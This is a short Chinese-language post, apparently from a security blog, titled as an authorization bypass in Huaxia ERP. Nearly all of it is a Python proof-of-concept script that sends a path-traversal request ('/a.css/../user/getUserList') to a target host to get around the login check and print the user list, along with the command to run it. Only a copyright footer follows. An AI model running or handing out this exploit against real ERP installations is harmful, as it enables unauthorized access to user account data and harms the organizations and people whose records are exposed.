# 華夏ERP授權繞過漏洞
==POC==
python3 poc.py http://ip:port
import sys,requests
def main(ip):
url = "{ip}/a.css/../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D¤tPage=1&pageSize=15".format(ip=ip)
res = requests.get(url,verify=False,timeout=5)
if res.status_code == 200:
print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))
main(sys.argv[1])
'''
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容